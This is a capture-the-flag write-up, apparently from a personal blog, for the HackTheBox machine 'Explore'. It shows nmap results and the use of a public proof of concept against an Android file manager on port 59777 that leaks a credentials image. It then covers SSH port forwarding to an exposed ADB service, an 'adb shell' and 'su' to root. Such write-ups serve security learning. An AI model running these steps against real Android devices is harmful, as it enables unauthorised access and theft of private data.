This page looks best with JavaScript enabled

HackTheBox: Explore

 ·  ☕ 4 min read

User

A quick nmap showed some high ports:

PORT      STATE SERVICE VERSION                                                                                                                                                                                                                                                                                               
2222/tcp  open  ssh     (protocol 2.0)                                                                                                                                                                                                                                                                                        
| fingerprint-strings:                                                                                                                                                                                                                                                                                                        
|   NULL:                                                                                                                                                                                                                                                                                                                     
|_    SSH-2.0-SSH Server - Banana Studio                                                                                                                                                                                                                                                                                      
| ssh-hostkey:                                                                                                                                                                                                                                                                                                                
|_  2048 71:90:e3:a7:c9:5d:83:66:34:88:3d:eb:b4:c7:88:fb (RSA)                                                                                                                                                                                                                                                                
42859/tcp open  unknown                                                                                                                                                                                                                                                                                                       
| fingerprint-strings:                                                                                                                                                                                                                                                                                                        
|   GenericLines:                                                                                                                                                                                                                                                                                                             
|     HTTP/1.0 400 Bad Request                                                                                                                                                                                                                                                                                                
|     Date: Sun, 27 Jun 2021 22:19:44 GMT                                                                                                                                                                                                                                                                                     
|     Content-Length: 22                                                                                                                                                                                                                                                                                                      
|     Content-Type: text/plain; charset=US-ASCII                                                                                                                                                                                                                                                                              
|     Connection: Close                                                                                                                                                                                                                                                                                                       
|     Invalid request line:                                                                                                                                                                                                                                                                                                   
|   GetRequest:                                                                                                                                                                                                                                                                                                               
|     HTTP/1.1 412 Precondition Failed                                                                                                                                                                                                                                                                                        
|     Date: Sun, 27 Jun 2021 22:19:44 GMT                                                                                                                                                                                                                                                                                     
|     Content-Length: 0                                                                                                                                                                                                                                                                                                       
|   HTTPOptions:                                                                                                                                                                                                                                                                                                              
|     HTTP/1.0 501 Not Implemented                                                                                                                                                                                                                                                                                            
|     Date: Sun, 27 Jun 2021 22:19:49 GMT                                                                                                                                                                                                                                                                                     
|     Content-Length: 29                                                                                                                                                                                                                                                                                                      
|     Content-Type: text/plain; charset=US-ASCII                                                                                                                                                                                                                                                                              
|     Connection: Close                                                                                                                                                                                                                                                                                                       
|     Method not supported: OPTIONS                                                                                                                                                                                                                                                                                           
|   Help:                                                                                                                                                                                                                                                                                                                     
|     HTTP/1.0 400 Bad Request                                                                                                                                                                                                                                                                                                
|     Date: Sun, 27 Jun 2021 22:20:04 GMT                                                                                                                                                                                                                                                                                     
|     Content-Length: 26                                                                                                                                                                                                                                                                                                      
|     Content-Type: text/plain; charset=US-ASCII                                                                                                                                                                                                                                                                              
|     Connection: Close                                                                                                                                                                                                                                                                                                       
|     Invalid request line: HELP                                                                                                                                                                                                                                                                                              
|   RTSPRequest:                                                                                                                                                                                                                                                                                                              
|     HTTP/1.0 400 Bad Request                                                                                                                                                                                                                                                                                                
|     Date: Sun, 27 Jun 2021 22:19:49 GMT                                                                                                                                                                                                                                                                                     
|     Content-Length: 39                                                                                                                                                                                                                                                                                                      
|     Content-Type: text/plain; charset=US-ASCII
|     Connection: Close
|     valid protocol version: RTSP/1.0

|   SSLSessionReq: 
|     HTTP/1.0 400 Bad Request
|     Date: Sun, 27 Jun 2021 22:20:04 GMT
|     Content-Length: 73
|     Content-Type: text/plain; charset=US-ASCII
|     Connection: Close
|     Invalid request line: 
|     ?G???,???`~?
|     ??{????w????<=?o?
|   TLSSessionReq: 
|     HTTP/1.0 400 Bad Request
|     Date: Sun, 27 Jun 2021 22:20:04 GMT
|     Content-Length: 71
|     Content-Type: text/plain; charset=US-ASCII
|     Connection: Close
|     Invalid request line: 
|     ??random1random2random3random4
|   TerminalServerCookie: 
|     HTTP/1.0 400 Bad Request
|     Date: Sun, 27 Jun 2021 22:20:04 GMT
|     Content-Length: 54
|     Content-Type: text/plain; charset=US-ASCII
|     Connection: Close
|     Invalid request line: 
|_    Cookie: mstshash=nmap
59777/tcp open  http    Bukkit JSONAPI httpd for Minecraft game server 3.6.0 or older
|_http-title: Site doesn't have a title (text/plain).
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port2222-TCP:V=7.91%I=7%D=6/28%Time=60D8F97E%P=x86_64-pc-linux-gnu%r(NU
SF:LL,24,"SSH-2\.0-SSH\x20Server\x20-\x20Banana\x20Studio\r\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port42859-TCP:V=7.91%I=7%D=6/28%Time=60D8F97D%P=x86_64-pc-linux-gnu%r(G
SF:enericLines,AA,"HTTP/1\.0\x20400\x20Bad\x20Request\r\nDate:\x20Sun,\x20
SF:27\x20Jun\x202021\x2022:19:44\x20GMT\r\nContent-Length:\x2022\r\nConten
SF:t-Type:\x20text/plain;\x20charset=US-ASCII\r\nConnection:\x20Close\r\n\
SF:r\nInvalid\x20request\x20line:\x20")%r(GetRequest,5C,"HTTP/1\.1\x20412\
SF:x20Precondition\x20Failed\r\nDate:\x20Sun,\x2027\x20Jun\x202021\x2022:1
SF:9:44\x20GMT\r\nContent-Length:\x200\r\n\r\n")%r(HTTPOptions,B5,"HTTP/1\
SF:.0\x20501\x20Not\x20Implemented\r\nDate:\x20Sun,\x2027\x20Jun\x202021\x
SF:2022:19:49\x20GMT\r\nContent-Length:\x2029\r\nContent-Type:\x20text/pla
SF:in;\x20charset=US-ASCII\r\nConnection:\x20Close\r\n\r\nMethod\x20not\x2
SF:0supported:\x20OPTIONS")%r(RTSPRequest,BB,"HTTP/1\.0\x20400\x20Bad\x20R
SF:equest\r\nDate:\x20Sun,\x2027\x20Jun\x202021\x2022:19:49\x20GMT\r\nCont
SF:ent-Length:\x2039\r\nContent-Type:\x20text/plain;\x20charset=US-ASCII\r
SF:\nConnection:\x20Close\r\n\r\nNot\x20a\x20valid\x20protocol\x20version:
SF:\x20\x20RTSP/1\.0")%r(Help,AE,"HTTP/1\.0\x20400\x20Bad\x20Request\r\nDa
SF:te:\x20Sun,\x2027\x20Jun\x202021\x2022:20:04\x20GMT\r\nContent-Length:\
SF:x2026\r\nContent-Type:\x20text/plain;\x20charset=US-ASCII\r\nConnection
SF::\x20Close\r\n\r\nInvalid\x20request\x20line:\x20HELP")%r(SSLSessionReq
SF:,DD,"HTTP/1\.0\x20400\x20Bad\x20Request\r\nDate:\x20Sun,\x2027\x20Jun\x
SF:202021\x2022:20:04\x20GMT\r\nContent-Length:\x2073\r\nContent-Type:\x20
SF:text/plain;\x20charset=US-ASCII\r\nConnection:\x20Close\r\n\r\nInvalid\
SF:x20request\x20line:\x20\x16\x03\0\0S\x01\0\0O\x03\0\?G\?\?\?,\?\?\?`~\?
SF:\0\?\?{\?\?\?\?w\?\?\?\?<=\?o\?\x10n\0\0\(\0\x16\0\x13\0")%r(TerminalSe
SF:rverCookie,CA,"HTTP/1\.0\x20400\x20Bad\x20Request\r\nDate:\x20Sun,\x202
SF:7\x20Jun\x202021\x2022:20:04\x20GMT\r\nContent-Length:\x2054\r\nContent
SF:-Type:\x20text/plain;\x20charset=US-ASCII\r\nConnection:\x20Close\r\n\r
SF:\nInvalid\x20request\x20line:\x20\x03\0\0\*%\?\0\0\0\0\0Cookie:\x20msts
SF:hash=nmap")%r(TLSSessionReq,DB,"HTTP/1\.0\x20400\x20Bad\x20Request\r\nD
SF:ate:\x20Sun,\x2027\x20Jun\x202021\x2022:20:04\x20GMT\r\nContent-Length:
SF:\x2071\r\nContent-Type:\x20text/plain;\x20charset=US-ASCII\r\nConnectio
SF:n:\x20Close\r\n\r\nInvalid\x20request\x20line:\x20\x16\x03\0\0i\x01\0\0
SF:e\x03\x03U\x1c\?\?random1random2random3random4\0\0\x0c\0/\0");

With a google search found that port 59777 is used by a file manager app, and it leaks user data throught it. Also there is a poc in github to exploit it.

Using the tool found an interesting pic:

python3 poc.py --cmd listPics --host explore.htb
[*] Executing command: listPics on explore.htb
[*] Server responded with: 200

{"name":"concept.jpg", "time":"4/21/21 02:38:08 AM", "location":"/storage/emulated/0/DCIM/concept.jpg", "size":"135.33 KB (138,573 Bytes)", },
{"name":"anc.png", "time":"4/21/21 02:37:50 AM", "location":"/storage/emulated/0/DCIM/anc.png", "size":"6.24 KB (6,392 Bytes)", },
{"name":"creds.jpg", "time":"4/21/21 02:38:18 AM", "location":"/storage/emulated/0/DCIM/creds.jpg", "size":"1.14 MB (1,200,401 Bytes)", },
{"name":"224_anc.png", "time":"4/21/21 02:37:21 AM", "location":"/storage/emulated/0/DCIM/224_anc.png", "size":"124.88 KB (127,876 Bytes)"}

When we open the creds file, there is user and password which can be used to log in on ssh on port 2222:
Creds

Root

After searching for kernel exploits that didn’t work, checked open ports and there is a port that wasn’t shown through nmap:

:/ $ netstat -tulpn                                                            
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program Name
tcp        0      1 10.129.131.203:38944    8.8.8.8:853             SYN_SENT    -
tcp        0      1 10.129.131.203:44666    1.1.1.1:853             SYN_SENT    -
tcp6       0      0 ::ffff:10.129.131:36443 :::*                    LISTEN      -
tcp6       0      0 :::59777                :::*                    LISTEN      -
tcp6       0      0 ::ffff:127.0.0.1:38185  :::*                    LISTEN      -
tcp6       0      0 :::2222                 :::*                    LISTEN      3347/net.xnano.android.sshserver
tcp6       0      0 :::5555                 :::*                    LISTEN      -
tcp6       0      0 :::42135                :::*                    LISTEN      -
tcp6       0     80 ::ffff:10.129.131.:2222 ::ffff:10.10.14.1:35232 ESTABLISHED 3347/net.xnano.android.sshserver
udp        0      0 0.0.0.0:57030           0.0.0.0:*                           -
udp        0      0 10.129.131.203:24641    1.1.1.1:53              ESTABLISHED -
udp     4352      0 10.129.131.203:68       10.129.0.1:67           ESTABLISHED -
udp        0      0 0.0.0.0:5353            0.0.0.0:*                           -
udp6       0      0 :::42555                :::*                                -
udp6       0      0 :::1900                 :::*                                -
udp6       0      0 ::ffff:10.129.131:44968 :::*                                -
udp6       0      0 :::5353                 :::*                                -
udp6       0      0 :::5353                 :::*                                -
udp6       0      0 :::5353                 :::*                                -

There is a post talking about that port on android which leads to a shell as root. However we need to redirect the port to our localhost, to do so we can use ssh:

ssh -L 5555:localhost:5555 kristi@explore.htb -p 2222

Now we can exploit adb pointing to localhost:

[jusepe@nix:~][0]$ adb connect localhost:5555
Connection refused
[jusepe@nix:~][0]$ adb connect localhost:5555
connected to localhost:5555
[jusepe@nix:~][0]$ adb shell
x86_64:/ $ id
uid=2000(shell) gid=2000(shell) groups=2000(shell),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3009(readproc),3011(uhid) context=u:r:shell:s0
x86_64:/ $ su
:/ # id
uid=0(root) gid=0(root) groups=0(root) context=u:r:su:s0
Share on

ITasahobby
WRITTEN BY
ITasahobby
InTernet lover